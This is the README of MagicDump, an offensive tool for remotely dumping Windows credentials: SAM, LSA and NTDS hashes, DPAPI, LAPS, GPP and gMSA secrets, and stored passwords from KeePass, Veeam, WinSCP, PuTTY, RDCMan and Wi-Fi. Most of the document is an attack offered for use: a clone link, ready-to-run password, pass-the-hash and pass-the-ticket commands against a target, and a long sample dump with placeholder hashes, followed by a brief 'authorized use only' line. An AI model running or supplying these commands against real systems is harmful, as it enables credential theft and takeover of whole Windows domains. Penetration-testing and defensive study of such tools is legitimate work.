MagicDump is an automated tool designed to remotely dump credentials from Windows machines, including SAM, LSA, NTDS, DPAPI, and many other credential stores. It simplifies the process of extracting sensitive information, providing organized output and support for multiple authentication methods.
- Comprehensive Credential Dumping:
- SAM, LSA, NTDS, DPAPI
- LAPS (Local Administrator Password Solution)
- Group Policy Preferences (GPP)
- gMSA (Group Managed Service Accounts)
- SCCM (System Center Configuration Manager)
- Token Broker Cache (Microsoft 365/Azure tokens)
- WiFi passwords
- KeePass credentials
- Veeam backup credentials
- WinSCP stored sessions
- PuTTY private keys & proxy credentials
- Remote Desktop Connection Manager (RDCMan) stored credentials
- Flexible Authentication:
- Username and Password Authentication.
- Pass-the-Hash Authentication.
- Pass-the-Ticket Authentication.
- Organized Output:
- Logs actions in JSON format.
- Saves dumps and logs to
~/.magicdump/
.
- Real-Time Feedback: Displays actions on the screen as they happen.
- Bash Shell
- Tools for credential dumping (e.g.,
impacket
,netexec
, etc.)
Clone the repository:
git clone https://github.com/Mag1cByt3s/MagicDump.git
cd MagicDump
Make the script executable:
chmod +x MagicDump
Run the script with the required options:
./MagicDump -t <target_ip> -u <username> [-p <password> | -H <hash> | -k [--no-pass]] [--local-auth] [-v]
-t
/--target
: Specify the target IP address of the Windows machine.-u
/--username
: Specify the username to authenticate as.-p
/--password
: Specify the password for authentication.-H
/--hash
: Specify the NTLM hash for Pass-the-Hash authentication.k
/--kerberos
: Use Kerberos authentication. Requires a valid Kerberos ticket.- If using Kerberos ticket cache (no password or hash), set the
KRB5CCNAME
environment variable to the path of your ticket and use--no-pass
.
- If using Kerberos ticket cache (no password or hash), set the
--no-pass
: Skip password or hash when using Kerberos authentication. Requires-k
.--local-auth
: Use local authentication (optional).-v
/--verbose
: Enable verbose output for debugging (optional).-h
/--help
: Show usage info
Password auth:
./MagicDump -t 192.168.1.100 -u administrator -p SuperSecretPass123
Pass-the-Hash:
./MagicDump -t 192.168.1.100 -u administrator -H '0123456789abcdef0123456789abcdef'
Local auth:
./MagicDump -t 192.168.1.100 -u administrator -p P@ssw0rd --local-auth
Pass-the-Ticket (Kerberos auth):
KRB5CCNAME=administrator@[email protected] ./MagicDump -t dc.company.com -u administrator -k --no-pass
Kerberos auth with password:
./MagicDump -t dc.company.com -u administrator -p 'StrongPassword123' -k
Output:
==============================
MagicDump v1.0
==============================
[INFO] Starting MagicDump against target 10.0.0.100
[INFO] Authenticating as user 'adminuser'...
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting SAM dump using netexec...
[LOG] Operation: SAM, Status: success
[INFO] SAM dump saved to /home/user/.magicdump/dumps/10.0.0.100/SAM_dump_10.0.0.100.txt
[SAM HASHES FOUND]:
SMB 10.0.0.100 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:COMPANY) (signing:True) (SMBv1:False)
SMB 10.0.0.100 445 DC [+] COMPANY\adminuser:500:FAKEHASH1 (Pwn3d!)
SMB 10.0.0.100 445 DC [*] Dumping SAM hashes
SMB 10.0.0.100 445 DC adminuser:500:FAKEHASH1:::
SMB 10.0.0.100 445 DC Guest:501:FAKEHASH2:::
SMB 10.0.0.100 445 DC defaultuser:503:FAKEHASH3:::
SMB 10.0.0.100 445 DC [+] Added 3 SAM hashes to the database
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting LSA dump using netexec...
[LOG] Operation: LSA, Status: success
[INFO] LSA dump saved to /home/user/.magicdump/dumps/10.0.0.100/LSA_dump_10.0.0.100.txt
[LSA SECRETS FOUND]:
SMB 10.0.0.100 445 DC COMPANY\DC$:aes256-cts-hmac-sha1-96:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
SMB 10.0.0.100 445 DC COMPANY\DC$:aes128-cts-hmac-sha1-96:BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
SMB 10.0.0.100 445 DC COMPANY\DC$:des-cbc-md5:CCCCCCCCCCCCCCCC
SMB 10.0.0.100 445 DC COMPANY\DC$:plain_password_hex:D41D8CD98F00B204E9800998ECF8427E
SMB 10.0.0.100 445 DC COMPANY\DC$:aad3b435b51404eeaad3b435b51404ee:FAKEHASH4:::
SMB 10.0.0.100 445 DC dpapi_machinekey:0xFAKEMACHINEKEY
dpapi_userkey:0xFAKEUSERKEY
SMB 10.0.0.100 445 DC NL$KM:FAKENLKM
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting NTDS dump using drsuapi...
[LOG] Operation: NTDS, Status: success
[INFO] NTDS dump saved to /home/user/.magicdump/dumps/10.0.0.100/NTDS_dump_10.0.0.100.txt
[NTDS DUMP COMPLETED]:
[NTDS HASHES FOUND]:
SMB 10.0.0.100 445 DC [+] COMPANY\adminuser:FAKENTDS (Pwn3d!)
SMB 10.0.0.100 445 DC [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB 10.0.0.100 445 DC adminuser:500:FAKENTDS1:::
SMB 10.0.0.100 445 DC Guest:501:FAKENTDS2:::
SMB 10.0.0.100 445 DC krbtgt:502:FAKENTDS3:::
SMB 10.0.0.100 445 DC bob:1103:FAKENTDS4:::
SMB 10.0.0.100 445 DC charlie:1104:FAKENTDS5:::
SMB 10.0.0.100 445 DC david:1105:FAKENTDS6:::
SMB 10.0.0.100 445 DC eve:1106:FAKENTDS7:::
SMB 10.0.0.100 445 DC frank:1107:FAKENTDS8:::
SMB 10.0.0.100 445 DC grace:1108:FAKENTDS9:::
SMB 10.0.0.100 445 DC heidi:14101:FAKENTDS10:::
SMB 10.0.0.100 445 DC COMPANY\ivan:25601:FAKENTDS11:::
SMB 10.0.0.100 445 DC COMPANY\judy:25603:FAKENTDS12:::
SMB 10.0.0.100 445 DC DC$:1000:FAKENTDS13:::
SMB 10.0.0.100 445 DC WEB-01$:1601:FAKENTDS14:::
SMB 10.0.0.100 445 DC WEB-02$:20601:FAKENTDS15:::
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting LAPS dump using LDAP...
[LOG] Operation: LAPS, Status: success
[INFO] LAPS dump saved to /home/user/.magicdump/dumps/10.0.0.100/LAPS_dump_10.0.0.100.txt
[LAPS PASSWORDS FOUND]:
No LAPS passwords found.
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting DPAPI dump...
[LOG] Operation: DPAPI, Status: success
[INFO] DPAPI dump saved to /home/user/.magicdump/dumps/10.0.0.100/DPAPI_dump_10.0.0.100.txt
[DPAPI SECRETS FOUND]:
-> Found 4 decrypted masterkeys.
Domain:batch=TaskScheduler:Task:{FAKE-GUID} - COMPANY\adminuser:FAKEDPAPI
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting GPP dump...
[LOG] Operation: GPP Autologin, Status: success
[LOG] Operation: GPP Password, Status: success
[INFO] GPP dump saved to /home/user/.magicdump/dumps/10.0.0.100/GPP_dump_10.0.0.100.txt
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting gMSA credential dump...
[LOG] Operation: gMSA, Status: success
[INFO] gMSA credentials dump saved to /home/user/.magicdump/dumps/10.0.0.100/gMSA_dump_10.0.0.100.txt
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting KeePass discovery...
[LOG] Operation: KeePass_Discovery, Status: success
[INFO] KeePass discovery results saved to /home/user/.magicdump/dumps/10.0.0.100/KeePass_Discovery_10.0.0.100.txt
[WARNING] KeePass installation detected, but no config path found!
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting Veeam password dump...
[LOG] Operation: Veeam_Credentials, Status: success
[INFO] Veeam credentials saved to /home/user/.magicdump/dumps/10.0.0.100/Veeam_Credentials_10.0.0.100.txt
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting WinSCP credential dump...
[LOG] Operation: WinSCP_Credentials, Status: success
[INFO] WinSCP credentials saved to /home/user/.magicdump/dumps/10.0.0.100/WinSCP_Credentials_10.0.0.100.txt
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting PuTTY credential & private key dump...
[LOG] Operation: PuTTY_Credentials, Status: success
[INFO] PuTTY credentials and private keys saved to /home/user/.magicdump/dumps/10.0.0.100/PuTTY_Credentials_10.0.0.100.txt
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting RDCMan credential dump...
[LOG] Operation: RDCMan_Credentials, Status: success
[INFO] RDCMan credentials saved to /home/user/.magicdump/dumps/10.0.0.100/RDCMan_Credentials_10.0.0.100.txt
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting Wi-Fi password dump...
[LOG] Operation: WiFi_Passwords, Status: success
[INFO] Wi-Fi passwords saved to /home/user/.magicdump/dumps/10.0.0.100/WiFi_Passwords_10.0.0.100.txt
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting SCCM dump (disk method)...
[LOG] Operation: SCCM, Status: success
[INFO] SCCM dump (disk) saved to /home/user/.magicdump/dumps/10.0.0.100/SCCM_dump_10.0.0.100.txt
----------------------------------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------------------------------
[INFO] Starting Token Broker Cache dump...
[LOG] Operation: TokenBrokerCache, Status: success
[INFO] Token Broker Cache dump saved to /home/user/.magicdump/dumps/10.0.0.100/TokenBrokerCache_10.0.0.100.txt
----------------------------------------------------------------------------------------------------------------------
[INFO] Dumping complete. Logs saved to /home/user/.magicdump/logs/10.0.0.100/report_10.0.0.100_TIMESTAMP.json.
{
"target_host": "10.0.0.100",
"operation_time": "2025-02-12T08:02:52Z",
"credentials_dumped": {
"SAM": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/SAM_dump_10.0.0.100.txt"
},
"LSA": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/LSA_dump_10.0.0.100.txt"
},
"NTDS": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/NTDS_dump_10.0.0.100.txt",
"method": "ntdsutil"
},
"LAPS": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/LAPS_dump_10.0.0.100.txt",
"method": "laps"
},
"DPAPI": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/DPAPI_dump_10.0.0.100.txt"
},
"GPP Autologin": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/GPP_dump_10.0.0.100.txt"
},
"GPP Password": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/GPP_dump_10.0.0.100.txt"
},
"gMSA": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/gMSA_dump_10.0.0.100.txt"
},
"KeePass_Discovery": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/KeePass_Discovery_10.0.0.100.txt",
"method": "keepass_discover"
},
"Veeam_Credentials": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/Veeam_Credentials_10.0.0.100.txt",
"method": "veeam"
},
"WinSCP_Credentials": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/WinSCP_Credentials_10.0.0.100.txt",
"method": "winscp"
},
"PuTTY_Credentials": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/PuTTY_Credentials_10.0.0.100.txt",
"method": "putty"
},
"RDCMan_Credentials": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/RDCMan_Credentials_10.0.0.100.txt",
"method": "rdcman"
},
"WiFi_Passwords": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/WiFi_Passwords_10.0.0.100.txt",
"method": "wifi"
},
"SCCM": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/SCCM_dump_10.0.0.100.txt",
"method": "disk"
},
"TokenBrokerCache": {
"status": "success",
"file_path": "/home/user/.magicdump/dumps/10.0.0.100/TokenBrokerCache_10.0.0.100.txt",
"method": "wam"
}
},
"warnings": [
"KeePass installation detected, but no config path found!"
],
"logs": [
"Starting MagicDump against target 10.0.0.100",
"Authenticating as user 'adminuser'...",
"Starting SAM dump using netexec...",
"SAM dump saved to /home/user/.magicdump/dumps/10.0.0.100/SAM_dump_10.0.0.100.txt",
"Starting LSA dump using netexec...",
"LSA dump saved to /home/user/.magicdump/dumps/10.0.0.100/LSA_dump_10.0.0.100.txt",
"Starting NTDS dump using drsuapi...",
"NTDS dump saved to /home/user/.magicdump/dumps/10.0.0.100/NTDS_dump_10.0.0.100.txt",
"Starting LAPS dump using LDAP...",
"LAPS dump saved to /home/user/.magicdump/dumps/10.0.0.100/LAPS_dump_10.0.0.100.txt",
"Starting DPAPI dump...",
"DPAPI dump saved to /home/user/.magicdump/dumps/10.0.0.100/DPAPI_dump_10.0.0.100.txt",
"Starting GPP dump...",
"GPP dump saved to /home/user/.magicdump/dumps/10.0.0.100/GPP_dump_10.0.0.100.txt",
"Starting gMSA credential dump...",
"gMSA credentials dump saved to /home/user/.magicdump/dumps/10.0.0.100/gMSA_dump_10.0.0.100.txt",
"Starting KeePass discovery...",
"KeePass discovery results saved to /home/user/.magicdump/dumps/10.0.0.100/KeePass_Discovery_10.0.0.100.txt",
"Starting Veeam password dump...",
"Veeam credentials saved to /home/user/.magicdump/dumps/10.0.0.100/Veeam_Credentials_10.0.0.100.txt",
"Starting WinSCP credential dump...",
"WinSCP credentials saved to /home/user/.magicdump/dumps/10.0.0.100/WinSCP_Credentials_10.0.0.100.txt",
"Starting PuTTY credential & private key dump...",
"PuTTY credentials and private keys saved to /home/user/.magicdump/dumps/10.0.0.100/PuTTY_Credentials_10.0.0.100.txt",
"Starting RDCMan credential dump...",
"RDCMan credentials saved to /home/user/.magicdump/dumps/10.0.0.100/RDCMan_Credentials_10.0.0.100.txt",
"Starting Wi-Fi password dump...",
"Wi-Fi passwords saved to /home/user/.magicdump/dumps/10.0.0.100/WiFi_Passwords_10.0.0.100.txt",
"Starting SCCM dump (disk method)...",
"SCCM dump (disk) saved to /home/user/.magicdump/dumps/10.0.0.100/SCCM_dump_10.0.0.100.txt",
"Starting Token Broker Cache dump...",
"Token Broker Cache dump saved to /home/user/.magicdump/dumps/10.0.0.100/TokenBrokerCache_10.0.0.100.txt"
]
}
- Integrate more advanced credential dumping techniques.
- Encrypt logs and dumps for security.
MagicDump is intended for authorized use only. Ensure you have permission before using this tool on any system.